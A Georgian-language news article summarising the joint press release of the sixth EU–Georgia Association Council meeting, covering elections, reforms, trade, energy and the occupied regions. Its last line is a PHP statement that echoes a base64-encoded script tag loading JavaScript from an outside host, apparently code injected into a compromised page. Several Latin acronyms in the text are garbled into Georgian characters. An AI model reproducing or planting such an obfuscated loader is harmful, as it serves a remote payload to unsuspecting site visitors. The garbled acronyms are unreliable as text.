celsiusi
ავერსი საქკაბელი
2020 წლის 31 ოქტომბრისა და 21 ნოემბრის არჩევნები კონკურენტული იყო და რომ, მთლიანობაში, დაცული იყო ფუნდამენტური თავისუფლებები, - ამის შესახებ საქართველო-ევროკავშირის ასოცირების საბჭოს მე-6 შეხვედრის შემდგომი ერთობლივ პრესრელიზშია აღნიშნული. ასოცირების საბჭომ ცნობად მიიღო საქართველოს მიერ ასოცირების შეთანხმების განხორციელების 2021 წელს გამოქვეყნებული ანგარიში და შეაფასა საქართველო-ევროკავშირის ურთიერთობებში არსებული მდგომარეობა ასოცირების საბჭოს 2019 წლის მარტში ჩატარებული ბოლო შეხვედრის შემდეგ. მხარეებმა კიდევ ერთხელ დაადასტურეს მზაობა, რომ ერთობლივად გააგრძელებენ ასოცირების შეთანხმებისა და მისი ღრმა და ყოვლისმომცველი თავისუფალი სავაჭრო სივრცის (DჩFთA) ფარგლებში ევროკავშირთან საქართველოს უფრო ღრმა პოლიტიკური ასოცირებისა და ეკონომიკური ინტეგრაციის ხელშეწყობას.
 
„ასოცირების საბჭო მიესალმა არსებული უმაღლესი დონის დიალოგის ხარისხსა და სიხშირეს და აღნიშნა, რომ მნიშვნელოვანია მის შედეგებზე აქტიური მუშაობა. ორივე მხარემ აღიარა საქართველოს ევროპული მისწრაფებები, მისი ევროპული არჩევანი და საერთო მიზანი, გააგრძელოს დემოკრატიული, სტაბილური და წარმატებული ქვეყნის შენება. ასოცირების საბჭო მიესალმა 2021-2027 წლების ასოცირების დღის წესრიგზე მიმდინარე მოლაპარაკებებს, რომლის მიზანია ასოცირების შეთანხმების, ღრმა და ყოვლისმომცველი თავისუფალი ვაჭრობის სივრცის ჩათვლით, განხორციელებისთვის პრიორიტეტების დასახვა. საქართველომ წარმოადგინა თავისი გეგმები 2024 წლისთვის ევროინტეგრაციის გზაზე შემდგომ წინსვლასთან დაკავშირებით”, - ნათქვამია პრესრელიზში.
 
ამასთან, ასოცირების საბჭო მიესალმა საქართველოს პროგრესს ევროპულ გზაზე, მათ შორის ჩOVID-19-ის გამოწვევების ფონზე და აღიარა საქართველოს მთავრობის ძალისხმევა როგორც ვირუსის შეკავების, ისევე მიზნობრივი სოციალური დახმარების უზრუნველყოფის კუთხით. ორივე მხარემ აღიარა ჩOVID-ის წინააღმდეგ ბრძოლაში ევროკავშირის სწრაფი დახმარების გადამწყვეტი მნიშვნელობა საქართველოსთვის, როგორც სოლიდარობის თვალსაჩინო ნიშანი.
 
„ორივე მხარემ კიდევ ერთხელ დაადასტურა უწყვეტი ვალდებულება, ხელშესახები სარგებელი მოუტანონ საქართველოს მოქალაქეებს თანამშრომლობის ძირითად სფეროებში: ეკონომიკური განვითარება და საბაზრო შესაძლებლობები; ინსტიტუტების გაძლიერება და კარგი მმართველობა; დაკავშირებულობა, ენერგოეფექტურობა, გარემო და კლიმატური ცვლილებები; მობილობისა და ხალხთა შორის კონტაქტების გაძლიერება.
 
ასოცირების საბჭომ აღნიშნა, რომ 2020 წლის 31 ოქტომბრისა და 21 ნოემბრის არჩევნები კონკურენტული იყო და რომ, მთლიანობაში, დაცული იყო ფუნდამენტური თავისუფლებები. ასოცირების საბჭო შეთანხმდა, რომ საარჩევნო გარემოს განსამტკიცებლად და არჩევნების დემოკრატიულად ჩატარებისათვის ხელსაყრელი გარემოს გასაუმჯობესებლად, მნიშვნელოვანია საერთაშორისო დამკვირვებლების, მათ შორის საერთაშორისო დამკვირვებლების მიერ, ეუთოს დემოკრატიული ინსტიტუტებისა და ადამიანის უფლებების ოფისის (OშჩE/ODIHღ) მიერ გამოვლენილ ხარვეზებთან დაკავშირებით გაცემული ყველა რეკომენდაციის გათვალისწინება, ამბიციური და ინკლუზიური საარჩევნო რეფორმის გზით”, - ნათქვამია პრესრელიზში.
 
ამასთან, ასოცირების საბჭომ სინანული გამოთქვა საქართველოში პოლიტიკური პოლარიზების გაღრმავების გამო.
 
„ევროკავშირმა მოუწოდა მიმდინარე პოლიტიკური სიტუაციის სწრაფი გადაწყვეტისკენ და ყველა მხარეს ძალისხმევის გაძლიერებისკენ, რათა მოხდეს სიტუაციის დეესკალაცია და გაერთიანება საერთო მიზნების იდენტიფიკაციისა და შეთანხმების ირგვლივ. ასოცირების საბჭო შეთანხმდა, რომ სასიცოცხლოდ მნიშვნელოვანია, ყველა მოთამაშემ გააგრძელოს მუშაობა, ევროკავშირის მიერ მხარდაჭერილი მედიაციის პირობებში, რათა რაც შეიძლება მალე მოგვარდეს პოლიტიკური კრიზისი საქართველოში.
 
ასოცირების საბჭომ განმეორებით მოუწოდა ყველა პოლიტიკურ მოთამაშეს საქართველოში ერთობლივი მუშაობისა და ღია დიალოგის შენარჩუნებისკენ, მათ შორის სამოქალაქო საზოგადოებასთან, იმისათვის, რომ კიდევ უფრო გაძლიერდეს დემოკრატიული ინსტიტუტები, მოხდეს პლურალისტური დემოკრატიის კონსოლიდაცია და გაგრძელდეს რეფორმები. ორივე მხარემ ხაზი გაუსვა, რომ საჭიროა სტრატეგიული კომუნიკაციის და დეზინფორმაციის წინააღმდეგ ბრძოლის სფეროებში საქართველოსა და ევროკავშირს შორის არსებული წარმატებული თანამშრომლობის გაგრძელება”, - ნათქვამია ინფორმაციაში.
 
პრესრელიზის თანახმად, ასოცირების საბჭო მიესალმა საქართველოს მიერ მიღწეულ პროგრესს კანონის უზენაესობისა და პენიტენციალურ სფეროებში რეფორმების განხორციელების კუთხით.
 
„საბჭომ ასევე აღნიშნა რამდენიმე სფერო, სადაც შემდგომი წინსვლაა საჭირო, მათ შორის სასამართლოს დამოუკიდებლობისა და ანგარიშვალდებულების გაძლიერების და უზენაესი სასამართლოს მოსამართლეთა დანიშვნის პროცესის ევროპულ სტანდარტებთან დაახლოების კუთხით. ევროკავშირმა ხაზი გაუსვა მზაობას, გააგრძელოს საქართველოს მხარდაჭერა სასამართლო სისტემის შემდგომი რეფორმირებისა და კანონის უზენაესობის განმტკიცების საკითხებში.
 
ასოცირების საბჭომ აღნიშნა, რომ ბოლო წლებში საქართველოს მოქალაქეთა დიდმა ნაწილმა ისარგებლა მოკლევადიანი უვიზო მიმოსვლით შენგენის ქვეყნებში. ის მიესალმა საქართველოს მხრიდან გაწეულ უწყვეტ ძალისხმევას უვიზო მიმოსვლის მოთხოვნების დარღვევების აღმოსაფხვრელად, მათ შორის, საქართველოს კანონში „საქართველოს მოქალაქეების საქართველოდან დროებითი გასვლის და საქართველოში შემოსვლის წესების შესახებ" განხორციელებულ უახლეს ცვლილებებს და ხაზი გაუსვა მისი ეფექტურად განხორციელების მნიშვნელობას. ასოცირების საბჭომ ხაზი გაუსვა, რომ ძალზედ მნიშვნელოვანია საქართველომ გააგრძელოს მუდმივი ძალისხმევა სავიზო რეჟიმის ლიბერალიზაციის ნიშნულების შესრულების მიზნით, განსაკუთრებით ევროკავშირის/შენგენის ქვეყნებში საქართველოს მოქალაქეების მიერ თავშესაფრის უსაფუძვლო განაცხადების ახლახანს შემცირებული რაოდენობის შესანარჩუნებლად და გასამყარებლად. ევროკავშირმა მოუწოდა საქართველოს, რომ კიდევ უფრო გააღრმავოს თანამშრომლობა ევროკავშირის წევრ სახელმწიფოებთან არალეგალური მიგრაციისა და ორგანიზებული დანაშაულის წინააღმდეგ ბრძოლის კუთხით. ორივე მხარე მიესალმა საქართველოსა და ევროპის სასაზღვრო და სანაპირო დაცვის სააგენტოს (Fრონტეხ) შორის ხელმოწერილ განახლებულ სამუშაო შეთანხმებას და ქვეყნის მიერ მიგრაციის ევროპულ ქსელში დამკვირვებლის სტატუსის მიღებას.
 
ასოცირების საბჭო მიესალმა ადამიანის უფლებათა სტრატეგიისა და მისი სამოქმედო გეგმის განხორციელებაში მიღწეულ პროგრესს, ასევე შინაგან საქმეთა სამინისტროს ადამიანის უფლებათა დაცვის დეპარტამენტის მიერ გაწეულ მნიშვნელოვან სამუშაოს. ევროკავშირმა აღიარა საქართველოს ძალისხმევა ამ მიმართულებით და მოუწოდა, გააგრძელოს ძალისხმევა ანტიდისკრიმინაციული კანონის ეფექტურად განხორციელების მიზნით და უზრუნველყოს ყველა უმცირესობის წარმომადგენელთა დაცვა და გენდერული თანასწორობა. საბჭომ განმეორებით დაადასტურა ერთგულება ადამიანის უფლებების უნივერსალობის პრინციპისადმი, განურჩევლად რელიგიისა თუ რწმენისა, რასისა, ეთნიკური წარმოშობისა, სქესისა, ენისა, სექსუალური ორიენტაციისა, გენდერული იდენტობისა, შესაძლებლობისა და სხვა. ასოცირების საბჭო მიესალმა საქართველოს მნიშვნელოვან პროგრესს შრომის ინსპექტირების ეფექტური სისტემის ჩამოყალიბებაში, იმისათვის რომ მეტად გაუმჯობესდეს სამუშაო პირობები და ამ სფეროში არსებული გამოწვევები გადაიჭრას საერთაშორისო და ევროპული შრომითი სტანდარტების შესაბამისად. ამასთან, საუბარი შეეხო ამ მიმართულებით თანამშრომლობის გაგრძელების მნიშვნელობას”, - ნათქვამია რელიზში.
 
ამასთან, პრესრელიზის თანახმად, ორივე მხარე მიესალმა საქართველოს მიერ ასოცირების შეთანხმების, მათ შორის ღრმა და ყოვლისმომცველი თავისუფალი ვაჭრობის შეთანხმების (DჩFთA) განხორციელებაში მიღწეულ პროგრესს.
 
„ევროკავშირი რჩება საქართველოს ყველაზე მნიშვნელოვან სავაჭრო პარტნიორად. ევროკავშირი და საქართველო შეთანხმდნენ ევროკავშირში საექსპორტო პოტენციალის მქონე სხვა პროდუქტების იდენტიფიცირებაზე, რაშიც ევროკავშირს შეუძლია დახმარების გაწევა. ორივე მხარე მიესალმა სტრუქტურული რეფორმების წარმატებით განხორციელებას და ხაზი გაუსვა საქართველოში საინვესტიციო გარემოს გაუმჯობესებასთან დაკავშირებით მიმდინარე რეფორმების მნიშვნელობას. ასოცირების საბჭო მიესალმა მცირე და საშუალო ბიზნესის განვითარების 2021-2025 წლების ახალი სტრატეგიის შემუშავების მიზნით მიმდინარე მუშაობას და ევროკავშირის მხარემ დაადასტურა მზაობა, რომ მხარი დაუჭიროს მის განხორციელებას.
 
ასოცირების საბჭო მიესალმა 2020 წლის ნოემბერში საქართველოსთვის მაკროფინანსური მხარდაჭერის ფარგლებში ტრანშების გამოყოფას და მოუწოდა ქვეყანას გააგრძელოს დარჩენილი შეთანხმებული ზომების გატარება, რათა შესაძლებელი გახდეს საქართველოში ჩOVID მაკროფინანსური დახმარების მეორე ტრანშის გაცემა (აქედან 75 მილიონი ევრო 2020 წელს გაიცა). ევროკავშირმა მოუწოდა საქართველოს უზრუნველყოს უკვე განხორციელებული რეფორმების მდგრადობა და მაკროეკონომიკური სტაბილურობის შენარჩუნება.
 
ასოცირების საბჭომ კიდევ ერთხელ დაადასტურა საქართველოს სტრატეგიული როლი ენერგეტიკის, ტრანსპორტის და დაკავშირებულობის სფეროში და რეგიონში მისი, როგორც ტრანსპორტირებისა და ლოგისტიკური ჰაბის, მზარდი ფუნქცია. ევროკავშირმა გამოთქვა მზაობა, გააგრძელოს ინტენსიური თანამშრომლობა საქართველოსთან დაკავშირებულობის დღის წესრიგის ფარგლებში, მათ შორის ძირითადი ინდიკატიური ტრანსევროპული სატრანსპორტო ქსელის (თEN-თ) ეტაპობრივი განხორციელების გზით, რაც ევროპასა და აზიას შორის საერთაშორისო ვაჭრობის გაღრმავებისკენ გადადგმული ნაბიჯი იქნება. მხარეებმა ასევე ხაზი გაუსვეს შავ ზღვაზე დაკავშირებულობის განვითარების მნიშვნელობას. ევროკავშირმა ცნობად მიიღო საქართველოს თხოვნა შავ ზღვაზე დაკავშირებულობის გაუმჯობესების გეგმის შემუშავებასა და განხორციელებაში დახმარების თაობაზე.
 
ასოცირების საბჭომ კიდევ ერთხელ გაუსვა ხაზი საქართველოს, როგორც ერთ-ერთი მთავარი პარტნიორის როლს ევროპის ენერგოუსაფრთხოებაში და განსაკუთრებით აღნიშნა ქვეყნის სატრანზიტო ფუნქცია კასპიის ნახშირწყალბადის რესურსების ევროკავშირის ბაზრებზე მიწოდების პროცესში, კერძოდ სამხრეთის გაზის დერეფნისა და შავი ზღვის გავლით, რაც ევროკავშირსა და საქართველოს შორის დაკავშირებადობას გააძლიერებს. ევროკავშირმა დაადასტურა მზაობა, განაგრძოს საჯარო შენობებში ენერგოეფექტურობის სტანდარტების დანერგვის ხელშეწყობა, საკვანძო სფეროებში საკანონმდებლო რეფორმებზე დაყრდნობით. ევროკავშირმა კვლავ დაადასტურა უწყვეტი მხარდაჭერა საქართველოს სოფლის მეურნეობისა და სასოფლო სექტორის გაძლიერების კუთხით, რათა გაუმჯობესდეს საცხოვრებელი პირობები სოფლად. ასოცირების საბჭომ აღნიშნა სამოქალაქო თავდაცვის სფეროში გაძლიერებული თანამშრომლობის მნიშვნელობა”, - ნათქვამია ინფორმაციაში.
 
ამასთან, ევროკავშირმა აღიარა საქართველო, როგორც ერთ-ერთი მთავარი პარტნიორი რეგიონში, და ხაზი გაუსვა ევროკავშირი-საქართველოს თანამშრომლობის მნიშვნელობას საგარეო და უსაფრთხოების პოლიტიკის სფეროში. ასოცირების საბჭომ აღნიშნა 2019 წლის ოქტომბერში უსაფრთხოების საკითხებზე ევროკავშირი-საქართველოს სტრატეგიული დიალოგის მესამე შეხვედრის დროს განხილული საკითხები და ხაზი გაუსვა შემდეგი შეხვედრის ორგანიზებას ამ ფორმატში.
 
„ევროკავშირმა მადლიერება გამოხატა ცენტრალური აფრიკის რესპუბლიკასა და მალის რესპუბლიკაში ევროკავშირის კრიზისული მართვის ოპერაციებსა და მისიებში საქართველოს მიერ გაწეული წვლილისთვის და გამოთქვა მზაობა, დაეხმაროს საქართველოს შესაძლებლობებისა და მედეგობის გაძლიერებაში.
 
ევროკავშირმა კვლავ დაადასტურა მტკიცე მხარდაჭერა საქართველოს სუვერენიტეტისა და ტერიტორიული მთლიანობისადმი მის საერთაშორისოდ აღიარებულ საზღვრებში. ევროკავშირმა კიდევ ერთხელ დაადასტურა მტკიცე მზაობა საქართველოში კონფლიქტის მშვიდობიანი გზით მოგვარების მიმართ, მის ხელთ არსებული ყველა ინსტრუმენტის გამოყენებით, მათ შორის არაღიარებისა და ჩართულობის პოლიტიკის ჩათვლით. სამხრეთ კავკასიაში და საქართველოში კრიზისის საკითხებში ევროკავშირის სპეციალური წარმომადგენლის და ევროკავშირის სადამკვირვებლო მისიის მუშაობა ევროკავშირის ძლიერი მხარდაჭერის ნათელი გამოხატულებაა.
 
ასოცირების საბჭომ ცნობად მიიღო ადამიანის უფლებათა ევროპული სასამართლოს დიდი პალატის 2021 წლის 21 იანვრის გადაწყვეტილება, სახელმწიფოთაშორის საქმეზე, რომელიც ეხებოდა 2008 წლის აგვისტოს საქართველოსა და რუსეთის ფედერაციას შორის შეიარაღებულ კონფლიქტს და მის შედეგებს, რომლითაც დაასკვნა, რომ 2008 წლის 12 აგვისტოს შემდეგ რუსეთის ფედერაციამ, რომელიც „ახორციელებს ეფექტურ კონტროლს აფხაზეთსა და სამხრეთ ოსეთზე", დაარღვია ადამიანის უფლებათა ევროპული კონვენციის რამდენიმე დებულება”, - ნათქვამია ინფორმაციაში.
 
პრესრელიზში აღნიშნულია, რომ ასოცირების საბჭომ ხაზი გაუსვა ჟენევის საერთაშორისო მოლაპარაკებების გადამწყვეტ მნიშვნელობას, 2008 წლის აგვისტოს საქართველო - რუსეთის კონფლიქტიდან მომდინარე გამოწვევებზე რეაგირებისა და მათი გადაჭრის მიზნით.
 
საბჭომ კიდევ ერთხელ ხაზი გაუსვა, რომ სრულყოფილი და ეფექტიანი ინციდენტების პრევენციისა და მათზე რეაგირების მექანიზმები (IPღMს) უმნიშვნელოვანესია ადგილზე კონფლიქტის შედეგად დაზარალებული მოსახლეობის უსაფრთხოებისა და ჰუმანიტარული საჭიროებების უზრუნველსაყოფად. ამასთან დაკავშირებით, საბჭო მიესალმა ერგნეთის IPღM შეხვედრების განახლებას და ხაზი გაუსვა გალის IPღM განახლების გადამწყვეტ მნიშვნელობას.
 
„საბჭომ შეშფოთება გამოხატა რუსეთის ფედერაციასა და საქართველოს აფხაზეთის რეგიონს შორის ერთიანი სოციალური და ეკონომიკური სივრცის ფორმირების შესახებ ე.წ. პროგრამის ხელმოწერის, ისევე როგორც სხვა ნაბიჯების გამო, რომლებიც ძირს უთხრის საქართველოს სუვერენიტეტსა და ტერიტორიულ მთლიანობას და ხელს უწყობს უსაფრთხოებისა და ადამიანის უფლებების მდგომარეობის გაუარესებას საქართველოს აფხაზეთისა და ცხინვალის / სამხრეთ ოსეთის რეგიონებში, განსაკუთრებით მილიტარიზაციის გაძლიერებით, გამყოფი ხაზების გასწვრივ მავთულხლართების და სხვა ხელოვნური ბარიერების აღმართვით, „გამშვები პუნქტების" გრძელვადიანი ჩაკეტვით. შეშფოთების საგანს ასევე წარმოადგენს ეთნიკური ნიშნით ქართველების დისკრიმინაცია, თავისუფალი გადაადგილების შეზღუდვა, მათ შორის ჯანდაცვისა და სხვა სოციალურ მომსახურებაზე წვდომის მიზნით, თვითნებური დაკავებები, საკუთრების უფლებისა და მშობლიურ ენაზე სწავლის უფლების დარღვევა, იძულებით გადაადგილებულ პირთა და ლტოლვილთა მუდმივ საცხოვრებელ ადგილებში უსაფრთხო და ღირსეული დაბრუნების მუდმივი დაბრკოლებები, და არჩილ ტატუნაშვილისა და გიგა ოთხოზორიას სიცოცხლის ხელყოფა. ამასთან დაკავშირებით, ასოცირების საბჭომ კიდევ ერთხელ დაადასტურა, რომ მართლმსაჯულება უნდა აღსრულდეს.
 
ასოცირების საბჭომ განმეორებით დაადასტურა რუსეთის ფედერაციის ვალდებულება, შეასრულოს მის მიერ ნაკისრი საერთაშორისო ვალდებულებები, მათ შორის 2008 წლის 12 აგვისტოს ევროკავშირის შუამავლობით მიღწეული ცეცხლის შეწყვეტის შესახებ შეთანხმების შესაბამისად, კერძოდ, თავისი სამხედრო ძალების საქართველოს ტერიტორიიდან გაყვანა და უსაფრთხოების საერთაშორისო მექანიზმების შექმნასთან დაკავშირებული ყველა დაბრკოლების მოხსნა. ასოცირების საბჭომ კიდევ ერთხელ მოუწოდა რუსეთის ფედერაციას უზრუნველყოს ევროკავშირის სადამკვირვებლო მისიის წვდომა საქართველოს მთელ ტერიტორიაზე, მისიის მანდატის შესაბამისად. ასოცირების საბჭომ ასევე მოუწოდა, რომ შესაბამისი საერთაშორისო ორგანიზაციების ჰუმანიტარული და ადამიანის უფლებების მექანიზმებისთვისაც უზრუნველყოფილ იქნეს წვდომა.
 
ასოცირების საბჭომ ხაზგასმით აღნიშნა გამყოფ ხაზებზე ხალხთაშორისი კონტაქტებისა და ნდობის აღდგენისკენ მიმართული ზომების მხარდაჭერის მნიშვნელობა. ამ თვალსაზრისით, ასოცირების საბჭომ კიდევ ერთხელ გამოხატა მხარდაჭერა საქართველოს სამშვიდობო ინიციატივისადმი „ნაბიჯი უკეთესი მომავლისკენ"”, - ნათქვამია რელიზში.
 
გარდა ამისა, ევროკავშირმა უაღრესად დადებითად შეაფასა საქართველოს აქტიური მონაწილეობა „აღმოსავლეთ პარტნიორობის" მრავალმხრივ ფორმატში და ხაზგასმით აღნიშნა, რომ პარტნიორ ქვეყნებში მიმდინარე უწყვეტი რეფორმები უაღრესად მნიშვნელოვანია „აღმოსავლეთ პარტნიორობის" წარმატებისა და წელს მოგვიანებით დაგეგმილი „აღმოსავლეთ პარტნიორობის" სამიტისთვის.
 
ასოცირების საბჭოს თავმჯდომარეობდა ევროკავშირის უმაღლესი წარმომადგენელი საგარეო საქმეთა და უსაფრთხოების პოლიტიკის საკითხებში ჟოზეპ ბორელი. საქართველოს დელეგაციას ხელმძღვანელობდა საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი.
1384
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");